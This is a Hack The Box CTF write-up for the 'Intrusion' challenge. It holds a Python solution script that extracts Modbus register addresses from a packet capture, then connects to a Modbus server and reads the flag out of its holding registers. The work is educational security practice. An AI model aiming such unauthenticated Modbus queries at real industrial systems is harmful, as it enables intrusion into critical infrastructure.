HackTheBox Intrusion Writeup
Explore the basics of cybersecurity in the Intrusion Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.
network_logs.pcapng is parsed with:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
#!/usr/bin/python3
import socket
import sys
from time import sleep
from umodbus import conf
from umodbus.client import tcp
from scapy.all import rdpcap, TCP
conf.SIGNED_VALUES = True
if len(sys.argv) != 2:
print(f"Usage: {sys.argv[0]} <ip:port>")
sys.exit(1)
try:
ip, port = sys.argv[1].split(":")
port = int(port)
except ValueError:
print("Error: Invalid format for IP and port. Use <ip:port> format.")
sys.exit(1)
PCAP_FILE = "network_logs.pcapng"
def extract_modbus_commands_and_registers(pcap_file):
packets = rdpcap(pcap_file)
modbus_commands = []
register_addresses = []
for pkt in packets:
if TCP in pkt:
payload = bytes(pkt[TCP].payload).hex()
if "34" in payload:
modbus_commands.append(payload)
if len(payload) >= len("91ed00000006341000060001"):
packet = payload[-10:]
if packet.startswith("10"):
register_addr = int(packet[-6:-4], 16)
register_addresses.append(register_addr)
return modbus_commands, register_addresses
def main():
print("[*] Parsing Modbus commands and register addresses from the PCAP file...")
modbus_commands, register_addresses = extract_modbus_commands_and_registers(PCAP_FILE)
print("[*] Extracted Modbus Commands:")
for cmd in modbus_commands:
print(cmd)
print("\n[*] Register Addresses:")
print(register_addresses)
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))
print(f"Connected to Modbus server at {ip}:{port}")
except Exception as e:
print(f"Failed to connect to {ip}:{port} - {e}")
sys.exit(1)
flag = ""
try:
for address in register_addresses:
command = tcp.read_holding_registers(52, address, 1)
response = tcp.send_message(command, sock)
if isinstance(response, list) and response:
value = response[0]
flag += chr(value)
print(f"Register {address}: {value} -> {chr(value)}")
else:
print(f"Failed to read register {address}: {response}")
sleep(0.1)
except Exception as e:
print(f"Error during Modbus communication: {e}")
finally:
sock.close()
print("Connection closed.")
print(f"Retrieved flag: {flag}")
if __name__ == "__main__":
main()
Summary
The Intrusion Challenge at Hack The Box introduces participants to the fundamentals of hardware and network protocol security through the analysis of Modbus network traffic. This easy-level challenge emphasizes parsing, interaction with a Modbus server, and retrieving sensitive information stored in registers. By focusing on real-world applications of the Modbus protocol, the challenge delivers a practical learning experience, blending hardware-level insights with Python scripting to interact with industrial systems. It’s an excellent entry point for beginners to explore hardware security and network traffic analysis in a hands-on and engaging way.